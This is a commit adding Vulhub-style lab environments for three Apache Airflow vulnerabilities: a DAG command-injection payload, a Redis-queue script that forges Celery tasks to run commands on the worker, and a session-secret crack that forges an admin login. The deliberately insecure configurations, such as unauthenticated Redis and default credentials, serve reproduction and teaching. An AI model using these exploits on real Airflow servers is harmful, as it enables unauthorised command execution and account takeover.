first commit
airflow/CVE-2020-11978/1.png (new binary file, 118 KiB)
airflow/CVE-2020-11978/2.png (new binary file, 18 KiB)
airflow/CVE-2020-11978/3.png (new binary file, 16 KiB)
airflow/CVE-2020-11978/4.png (new binary file, 11 KiB)
airflow/CVE-2020-11978/README.md (new file, 46 lines)
# Apache Airflow Command Injection in Example Dag (CVE-2020-11978)

[中文版本(Chinese version)](README.zh-cn.md)

Apache Airflow is an open-source, distributed task scheduling framework. In versions 1.10.10 and earlier, the example DAG `example_trigger_target_dag` contains a command injection vulnerability that allows attackers to execute arbitrary commands in the worker process.

Since this environment starts many components, it may run slowly. Please allocate more than 2GB of memory to the virtual machine.

References:

- <https://lists.apache.org/thread/cn57zwylxsnzjyjztwqxpmly0x9q5ljx>
- <https://github.com/pberba/CVE-2020-11978>

## Vulnerability Environment

Execute the following commands to start Airflow 1.10.10:

```bash
# Initialize the database
docker compose run airflow-init

# Start the services
docker compose up -d
```

## Exploit

Visit `http://your-ip:8080` to open the Airflow management console, and switch the `example_trigger_target_dag` toggle to On:

![](1.png)

Click the "Trigger" button on the right, then submit a Configuration JSON containing the crafted payload `{"message":"'\";touch /tmp/airflow_dag_success;#"}`:

![](2.png)

Wait a few seconds and the DAG run will be marked as successful:

![](3.png)

Enter the CeleryWorker container to check the result; `touch /tmp/airflow_dag_success` has been executed:

```bash
docker compose exec airflow-worker ls -l /tmp
```

![](4.png)
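The payload works because the example DAG interpolates `dag_run.conf["message"]` into a `BashOperator` command template. A minimal sketch of the quote breakout, using a simplified template string (the exact template here is an assumption, reduced from `example_trigger_target_dag`):

```python
# Simplified stand-in for the bash_command template that the example DAG
# renders with the attacker-controlled "message" value.
template = 'echo "Here is the message: \'{message}\'"'

# The crafted payload closes the single and double quotes, injects a command,
# and comments out the leftover trailing quotes with "#".
payload = "'\";touch /tmp/airflow_dag_success;#"
rendered = template.format(message=payload)
print(rendered)
# The worker passes the rendered line to a shell, so the injected
# ";touch /tmp/airflow_dag_success;" runs as its own command.
```

This is why the payload needs both quote characters: one to escape the inner single-quoted context and one to terminate the surrounding double-quoted string.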
airflow/CVE-2020-11978/README.zh-cn.md (new file, 46 lines)
# Apache Airflow Command Injection in Example Dag (CVE-2020-11978)

Apache Airflow is an open-source, distributed task scheduling framework. In versions 1.10.10 and earlier, the example DAG `example_trigger_target_dag` contains a command injection vulnerability through which an unauthorized visitor can execute arbitrary commands in the worker.

Since this environment starts many components, it may run slowly; prepare more than 2GB of memory for it.

References:

- <https://lists.apache.org/thread/cn57zwylxsnzjyjztwqxpmly0x9q5ljx>
- <https://github.com/pberba/CVE-2020-11978>

## Vulnerability Environment

Execute the following commands in order to start Airflow 1.10.10:

```bash
# Initialize the database
docker compose run airflow-init

# Start the services
docker compose up -d
```

## Reproduction

Visit `http://your-ip:8080` to open the Airflow management console, and switch `example_trigger_target_dag` from Off to On:

![](1.png)

Click the trigger button, enter `{"message":"'\";touch /tmp/airflow_dag_success;#"}` in the Configuration JSON field, then click `Trigger` to run the DAG:

![](2.png)

After a few seconds you can see the run succeed:

![](3.png)

Enter the CeleryWorker container to check the result:

```bash
docker compose exec airflow-worker ls -l /tmp
```

You can see that `touch /tmp/airflow_dag_success` was executed successfully:

![](4.png)
airflow/CVE-2020-11978/docker-compose.yml (new file, 90 lines)
version: '3'
x-airflow-common:
  &airflow-common
  image: vulhub/airflow:1.10.10
  environment:
    &airflow-common-env
    AIRFLOW__CORE__EXECUTOR: CeleryExecutor
    AIRFLOW__CORE__SQL_ALCHEMY_CONN: postgresql+psycopg2://airflow:airflow@postgres/airflow
    AIRFLOW__CELERY__RESULT_BACKEND: db+postgresql://airflow:airflow@postgres/airflow
    AIRFLOW__CELERY__BROKER_URL: redis://:@redis:6379/0
    AIRFLOW__CORE__FERNET_KEY: ''
    AIRFLOW__CORE__DAGS_ARE_PAUSED_AT_CREATION: 'true'
    AIRFLOW__CORE__LOAD_EXAMPLES: 'true'
    #AIRFLOW__API__AUTH_BACKEND: 'airflow.api.auth.backend.basic_auth'
    AIRFLOW__API__AUTH_BACKEND: 'airflow.api.auth.backend.default'
  user: "${AIRFLOW_UID:-50000}:${AIRFLOW_GID:-50000}"
  depends_on:
    redis:
      condition: service_healthy
    postgres:
      condition: service_healthy

services:
  postgres:
    image: postgres:13-alpine
    environment:
      POSTGRES_USER: airflow
      POSTGRES_PASSWORD: airflow
      POSTGRES_DB: airflow
    healthcheck:
      test: ["CMD", "pg_isready", "-U", "airflow"]
      interval: 5s
      retries: 5

  redis:
    image: redis:5-alpine
    healthcheck:
      test: ["CMD", "redis-cli", "ping"]
      interval: 5s
      timeout: 30s
      retries: 50

  airflow-webserver:
    <<: *airflow-common
    command: webserver
    ports:
      - 8080:8080
    healthcheck:
      test: ["CMD", "curl", "--fail", "http://localhost:8080/health"]
      interval: 10s
      timeout: 10s
      retries: 5

  airflow-scheduler:
    <<: *airflow-common
    command: scheduler
    healthcheck:
      test: ["CMD-SHELL", 'airflow jobs check --job-type SchedulerJob --hostname "$${HOSTNAME}"']
      interval: 10s
      timeout: 10s
      retries: 5

  airflow-worker:
    <<: *airflow-common
    command: worker
    healthcheck:
      test:
        - "CMD-SHELL"
        - 'celery --app airflow.executors.celery_executor.app inspect ping -d "celery@$${HOSTNAME}"'
      interval: 10s
      timeout: 10s
      retries: 5

  airflow-init:
    <<: *airflow-common
    command: initdb
    environment:
      <<: *airflow-common-env
      _AIRFLOW_DB_UPGRADE: 'true'

  flower:
    <<: *airflow-common
    command: flower
    ports:
      - 5555:5555
    healthcheck:
      test: ["CMD", "curl", "--fail", "http://localhost:5555/"]
      interval: 10s
      timeout: 10s
      retries: 5
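The `x-airflow-common` block above is a YAML anchor, and every service pulls it in with the `<<: *airflow-common` merge key, overriding only its own `command`. A minimal sketch of those merge semantics, emulated with plain Python dicts (the keys shown are a reduced subset of the real file):

```python
# Shared settings, playing the role of the &airflow-common anchor.
airflow_common = {
    "image": "vulhub/airflow:1.10.10",
    "command": None,
}

# Each service merges the shared mapping and overrides its own keys,
# just like `<<: *airflow-common` followed by `command: webserver`.
webserver = {**airflow_common, "command": "webserver"}
scheduler = {**airflow_common, "command": "scheduler"}

print(webserver["image"], webserver["command"])
```

This keeps the five Airflow services (webserver, scheduler, worker, init, flower) in sync: changing the image or an environment variable in one place updates all of them.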
airflow/CVE-2020-11981/1.png (new binary file, 21 KiB)
airflow/CVE-2020-11981/2.png (new binary file, 11 KiB)
airflow/CVE-2020-11981/README.md (new file, 53 lines)
# Apache Airflow Celery Broker Remote Command Execution (CVE-2020-11981)

[中文版本(Chinese version)](README.zh-cn.md)

Apache Airflow is an open-source, distributed task scheduling framework. In versions 1.10.10 and earlier, an attacker who controls the Celery broker (such as Redis or RabbitMQ) can execute arbitrary commands in the worker process.

Since this environment starts many components, it may run slowly. Please allocate more than 2GB of memory to the virtual machine.

References:

- <https://lists.apache.org/thread/cn57zwylxsnzjyjztwqxpmly0x9q5ljx>
- <https://github.com/apache/airflow/pull/9178>

## Vulnerability Environment

Execute the following commands to start an Airflow 1.10.10 server:

```bash
# Initialize the database
docker compose run airflow-init

# Start the services
docker compose up -d
```

## Exploit

To exploit this vulnerability, you need write access to the Celery broker, which is Redis in this environment. In the Vulhub environment, Redis port 6379 is exposed to the Internet.

Through Redis, you can push the built-in task `airflow.executors.celery_executor.execute_command` onto the queue to execute arbitrary commands.

Use the script [exploit_airflow_celery.py](exploit_airflow_celery.py) to execute the command `touch /tmp/airflow_celery_success`:

```bash
pip install redis
python exploit_airflow_celery.py [your-ip]
```

See the results in the worker logs:

```bash
docker compose logs airflow-worker
```

![](1.png)

As you can see, `touch /tmp/airflow_celery_success` has been executed successfully:

```bash
docker compose exec airflow-worker ls -l /tmp
```

![](2.png)
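Celery's Redis transport carries each task as a JSON message whose `body` field is the base64 encoding of `[args, kwargs, options]`; that is the field the exploit script rewrites. A small sketch of the encoding round-trip (the option keys follow the Celery message format used by the script; treat the exact envelope as an assumption):

```python
import base64
import json

# Arguments for airflow.executors.celery_executor.execute_command:
# the worker will run this argv list.
command = ["touch", "/tmp/airflow_celery_success"]
body = [[command], {}, {"chain": None, "chord": None, "errbacks": None, "callbacks": None}]

# Encode the body the way the Redis transport stores it.
encoded = base64.b64encode(json.dumps(body).encode()).decode()

# A worker consuming the queue decodes it back into the call arguments.
decoded = json.loads(base64.b64decode(encoded))
print(decoded[0][0])
```

Anyone who can `LPUSH` such a message onto the worker's queue therefore controls what `execute_command` runs.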
airflow/CVE-2020-11981/README.zh-cn.md (new file, 51 lines)
# Apache Airflow Celery Broker Command Execution (CVE-2020-11981)

Apache Airflow is an open-source, distributed task scheduling framework. In versions 1.10.10 and earlier, an attacker who controls the Celery message broker (such as Redis or RabbitMQ) can execute arbitrary commands in the worker process by crafting messages.

Since this environment starts many components, it may run slowly; prepare more than 2GB of memory for it.

References:

- <https://lists.apache.org/thread/cn57zwylxsnzjyjztwqxpmly0x9q5ljx>
- <https://github.com/apache/airflow/pull/9178>

## Vulnerability Environment

Execute the following commands in order to start Airflow 1.10.10:

```bash
# Initialize the database
docker compose run airflow-init

# Start the services
docker compose up -d
```

## Exploitation

Exploiting this vulnerability requires control of the message broker; in the Vulhub environment, Redis is accessible without authentication. Through this unauthorized access, an attacker can enqueue the built-in task `airflow.executors.celery_executor.execute_command` to execute arbitrary commands, passing the command as an array argument.

We can use the small script [exploit_airflow_celery.py](exploit_airflow_celery.py) to execute the command `touch /tmp/airflow_celery_success`:

```bash
pip install redis
python exploit_airflow_celery.py [your-ip]
```

Check the results:

```bash
docker compose logs airflow-worker
```

You can see the following task messages:

![](1.png)

```bash
docker compose exec airflow-worker ls -l /tmp
```

You can see that the file `airflow_celery_success` was created successfully:

![](2.png)
airflow/CVE-2020-11981/docker-compose.yml (new file, 92 lines)
version: '3'
x-airflow-common:
  &airflow-common
  image: vulhub/airflow:1.10.10
  environment:
    &airflow-common-env
    AIRFLOW__CORE__EXECUTOR: CeleryExecutor
    AIRFLOW__CORE__SQL_ALCHEMY_CONN: postgresql+psycopg2://airflow:airflow@postgres/airflow
    AIRFLOW__CELERY__RESULT_BACKEND: db+postgresql://airflow:airflow@postgres/airflow
    AIRFLOW__CELERY__BROKER_URL: redis://:@redis:6379/0
    AIRFLOW__CORE__FERNET_KEY: ''
    AIRFLOW__CORE__DAGS_ARE_PAUSED_AT_CREATION: 'true'
    AIRFLOW__CORE__LOAD_EXAMPLES: 'true'
    #AIRFLOW__API__AUTH_BACKEND: 'airflow.api.auth.backend.basic_auth'
    AIRFLOW__API__AUTH_BACKEND: 'airflow.api.auth.backend.default'
  user: "${AIRFLOW_UID:-50000}:${AIRFLOW_GID:-50000}"
  depends_on:
    redis:
      condition: service_healthy
    postgres:
      condition: service_healthy

services:
  postgres:
    image: postgres:13-alpine
    environment:
      POSTGRES_USER: airflow
      POSTGRES_PASSWORD: airflow
      POSTGRES_DB: airflow
    healthcheck:
      test: ["CMD", "pg_isready", "-U", "airflow"]
      interval: 5s
      retries: 5

  redis:
    image: redis:5-alpine
    ports:
      - 6379:6379
    healthcheck:
      test: ["CMD", "redis-cli", "ping"]
      interval: 5s
      timeout: 30s
      retries: 50

  airflow-webserver:
    <<: *airflow-common
    command: webserver
    ports:
      - 8080:8080
    healthcheck:
      test: ["CMD", "curl", "--fail", "http://localhost:8080/health"]
      interval: 10s
      timeout: 10s
      retries: 5

  airflow-scheduler:
    <<: *airflow-common
    command: scheduler
    healthcheck:
      test: ["CMD-SHELL", 'airflow jobs check --job-type SchedulerJob --hostname "$${HOSTNAME}"']
      interval: 10s
      timeout: 10s
      retries: 5

  airflow-worker:
    <<: *airflow-common
    command: worker
    healthcheck:
      test:
        - "CMD-SHELL"
        - 'celery --app airflow.executors.celery_executor.app inspect ping -d "celery@$${HOSTNAME}"'
      interval: 10s
      timeout: 10s
      retries: 5

  airflow-init:
    <<: *airflow-common
    command: initdb
    environment:
      <<: *airflow-common-env
      _AIRFLOW_DB_UPGRADE: 'true'

  flower:
    <<: *airflow-common
    command: flower
    ports:
      - 5555:5555
    healthcheck:
      test: ["CMD", "curl", "--fail", "http://localhost:5555/"]
      interval: 10s
      timeout: 10s
      retries: 5
airflow/CVE-2020-11981/exploit_airflow_celery.py (new file, 14 lines)
import base64
import json
import sys

import redis

# Connect to the exposed Celery broker (Redis) on the target.
r = redis.Redis(host=sys.argv[1], port=6379, decode_responses=True, db=0)
queue_name = 'default'

# Template of a Celery task message for airflow.executors.celery_executor.execute_command.
ori_str = "{\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": \"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \"W1sxMDAsIDIwMF0sIHt9LCB7ImNoYWluIjogbnVsbCwgImNob3JkIjogbnVsbCwgImVycmJhY2tzIjogbnVsbCwgImNhbGxiYWNrcyI6IG51bGx9XQ==\"}"
task_dict = json.loads(ori_str)

# Replace the task body with the command to execute on the worker.
command = ['touch', '/tmp/airflow_celery_success']
body = [[command], {}, {"chain": None, "chord": None, "errbacks": None, "callbacks": None}]
task_dict['body'] = base64.b64encode(json.dumps(body).encode()).decode()
print(task_dict)

# Push the forged message onto the queue consumed by the Airflow workers.
r.lpush(queue_name, json.dumps(task_dict))
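To see what the script replaces, you can decode the `body` of its template message; it holds the placeholder arguments `(100, 200)` that the script swaps for the `touch` command:

```python
import base64
import json

# The template message's body field, copied from exploit_airflow_celery.py.
template_body = "W1sxMDAsIDIwMF0sIHt9LCB7ImNoYWluIjogbnVsbCwgImNob3JkIjogbnVsbCwgImVycmJhY2tzIjogbnVsbCwgImNhbGxiYWNrcyI6IG51bGx9XQ=="

# Celery bodies are base64-encoded JSON: [args, kwargs, options].
args, kwargs, options = json.loads(base64.b64decode(template_body))
print(args, kwargs, options)
```

This matches the `argsrepr: "(100, 200)"` header in the template, which the script leaves untouched; workers only act on the decoded body.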
airflow/CVE-2020-17526/1.png (new binary file, 27 KiB)
airflow/CVE-2020-17526/2.png (new binary file, 20 KiB)
airflow/CVE-2020-17526/3.png (new binary file, 11 KiB)
airflow/CVE-2020-17526/4.png (new binary file, 106 KiB)
airflow/CVE-2020-17526/README.md (new file, 56 lines)
# Apache Airflow Authentication Bypass (CVE-2020-17526)

[中文版本(Chinese version)](README.zh-cn.md)

Apache Airflow is an open-source, distributed task scheduling framework. Authentication is not required by default, but an administrator can set `webserver.authenticate=True` to enable it.

In versions 1.10.13 and earlier, Apache Airflow uses a default session secret key, which allows an attacker to impersonate arbitrary users when authentication is enabled.

References:

- <https://lists.apache.org/thread/rxn1y1f9fco3w983vk80ps6l32rzm6t0>
- <https://kloudle.com/academy/authentication-bypass-in-apache-airflow-cve-2020-17526-and-aws-cloud-platform-compromise>

## Vulnerability Environment

Execute the following commands to start an Airflow 1.10.10 server:

```bash
# Initialize the database
docker compose run airflow-init

# Start the services
docker compose up -d
```

After the server starts, browse to `http://your-ip:8080` to see the login page of Apache Airflow; this server requires authentication.

## Exploit

First, request the login page and obtain a session string from the Cookie:

```bash
curl -v http://localhost:8080/admin/airflow/login
```

![](1.png)

Then, use [flask-unsign](https://github.com/Paradoxis/Flask-Unsign) to crack the session secret key:

```bash
flask-unsign -u -c [session from Cookie]
```

![](2.png)

Bingo, we got the valid secret key `temporary_key`. Use this key to generate a new session whose `user_id` equals `1`:

```bash
flask-unsign -s --secret temporary_key -c "{'user_id': '1', '_fresh': False, '_permanent': True}"
```

![](3.png)

Finally, use this generated session to log in successfully:

![](4.png)
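flask-unsign works because a Flask session cookie is signed, not encrypted: anyone can read the payload, and anyone who knows the secret key can produce a valid signature. A conceptual sketch using a plain HMAC (this simplifies Flask's real itsdangerous format, which also compresses the payload and embeds a timestamp, so it is not byte-compatible with actual Flask cookies):

```python
import base64
import hashlib
import hmac
import json

def sign(payload: dict, secret: str) -> str:
    # Serialize the session payload and append an HMAC keyed by the
    # server's secret. The trust model matches Flask's: possession of
    # the secret is the only thing that makes a cookie "valid".
    data = base64.urlsafe_b64encode(json.dumps(payload, sort_keys=True).encode()).decode()
    sig = hmac.new(secret.encode(), data.encode(), hashlib.sha1).hexdigest()
    return f"{data}.{sig}"

def verify(cookie: str, secret: str) -> dict:
    data, sig = cookie.rsplit(".", 1)
    expected = hmac.new(secret.encode(), data.encode(), hashlib.sha1).hexdigest()
    if not hmac.compare_digest(sig, expected):
        raise ValueError("bad signature")
    return json.loads(base64.urlsafe_b64decode(data))

# With the default secret recovered, an attacker forges an admin session.
forged = sign({"user_id": "1", "_fresh": False, "_permanent": True}, "temporary_key")
print(verify(forged, "temporary_key"))
```

Since the server ships with the hard-coded `temporary_key`, any attacker can run the same signing step the server does, which is exactly what the `flask-unsign -s --secret temporary_key` command above performs.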
airflow/CVE-2020-17526/README.zh-cn.md (new file, 56 lines)
# Apache Airflow Authentication Bypass via Default Secret Key (CVE-2020-17526)

Apache Airflow is an open-source, distributed task scheduling framework. By default, Apache Airflow does not require user authentication, but an administrator can enable it by setting `webserver.authenticate=True`.

In versions 1.10.13 and earlier, even with authentication enabled, an attacker can bypass the login and impersonate arbitrary users by abusing a default secret key.

References:

- <https://lists.apache.org/thread/rxn1y1f9fco3w983vk80ps6l32rzm6t0>
- <https://kloudle.com/academy/authentication-bypass-in-apache-airflow-cve-2020-17526-and-aws-cloud-platform-compromise>

## Vulnerability Environment

Execute the following commands to start an Apache Airflow 1.10.10 server:

```bash
# Initialize the database
docker compose run airflow-init

# Start the services
docker compose up -d
```

After the server starts, visit `http://your-ip:8080` to see the login page.

## Exploitation

First, visit the login page; the server returns a signed session in the Cookie:

```bash
curl -v http://localhost:8080/admin/airflow/login
```

![](1.png)

Then, use [flask-unsign](https://github.com/Paradoxis/Flask-Unsign) to brute-force the `SECRET_KEY` used for signing:

```bash
flask-unsign -u -c [session from Cookie]
```

![](2.png)

Bingo, the key `temporary_key` is cracked successfully. Use this key to generate a new session with a forged `user_id` of 1:

```bash
flask-unsign -s --secret temporary_key -c "{'user_id': '1', '_fresh': False, '_permanent': True}"
```

![](3.png)

Use this newly generated session in the browser; you are now logged in:

![](4.png)
airflow/CVE-2020-17526/docker-compose.yml (new file, 92 lines)
version: '3'
x-airflow-common:
  &airflow-common
  image: vulhub/airflow:1.10.10
  environment:
    &airflow-common-env
    AIRFLOW__CORE__EXECUTOR: CeleryExecutor
    AIRFLOW__CORE__SQL_ALCHEMY_CONN: postgresql+psycopg2://airflow:airflow@postgres/airflow
    AIRFLOW__CELERY__RESULT_BACKEND: db+postgresql://airflow:airflow@postgres/airflow
    AIRFLOW__CELERY__BROKER_URL: redis://:@redis:6379/0
    AIRFLOW__CORE__FERNET_KEY: ''
    AIRFLOW__CORE__DAGS_ARE_PAUSED_AT_CREATION: 'true'
    AIRFLOW__CORE__LOAD_EXAMPLES: 'true'
    AIRFLOW__WEBSERVER__AUTHENTICATE: 'true'
    AIRFLOW__WEBSERVER__AUTH_BACKEND: 'airflow.contrib.auth.backends.password_auth'
  user: "${AIRFLOW_UID:-50000}:${AIRFLOW_GID:-50000}"
  depends_on:
    redis:
      condition: service_healthy
    postgres:
      condition: service_healthy

services:
  postgres:
    image: postgres:13-alpine
    environment:
      POSTGRES_USER: airflow
      POSTGRES_PASSWORD: airflow
      POSTGRES_DB: airflow
    healthcheck:
      test: ["CMD", "pg_isready", "-U", "airflow"]
      interval: 5s
      retries: 5

  redis:
    image: redis:5-alpine
    healthcheck:
      test: ["CMD", "redis-cli", "ping"]
      interval: 5s
      timeout: 30s
      retries: 50

  airflow-webserver:
    <<: *airflow-common
    command: webserver
    ports:
      - 8080:8080
    healthcheck:
      test: ["CMD", "curl", "--fail", "http://localhost:8080/health"]
      interval: 10s
      timeout: 10s
      retries: 5

  airflow-scheduler:
    <<: *airflow-common
    command: scheduler
    healthcheck:
      test: ["CMD-SHELL", 'airflow jobs check --job-type SchedulerJob --hostname "$${HOSTNAME}"']
      interval: 10s
      timeout: 10s
      retries: 5

  airflow-worker:
    <<: *airflow-common
    command: worker
    healthcheck:
      test:
        - "CMD-SHELL"
        - 'celery --app airflow.executors.celery_executor.app inspect ping -d "celery@$${HOSTNAME}"'
      interval: 10s
      timeout: 10s
      retries: 5

  airflow-init:
    <<: *airflow-common
    entrypoint: python /opt/airflow/init-user.py
    volumes:
      - ./init-user.py:/opt/airflow/init-user.py
    environment:
      <<: *airflow-common-env
      _AIRFLOW_DB_UPGRADE: 'true'

  flower:
    <<: *airflow-common
    command: flower
    ports:
      - 5555:5555
    healthcheck:
      test: ["CMD", "curl", "--fail", "http://localhost:5555/"]
      interval: 10s
      timeout: 10s
      retries: 5
airflow/CVE-2020-17526/init-user.py (new file, 17 lines)
#!/usr/bin/env python
import os

from airflow import models, settings
from airflow.contrib.auth.backends.password_auth import PasswordUser

# Initialize the Airflow metadata database first.
os.system('/entrypoint initdb')

# Create a default superuser for the password_auth backend.
user = PasswordUser(models.User())
user.username = 'vulhub'
user.email = 'vulhub@example.com'
user.password = 'vulhub'
user.superuser = True

session = settings.Session()
session.add(user)
session.commit()
session.close()
print('initial user finished')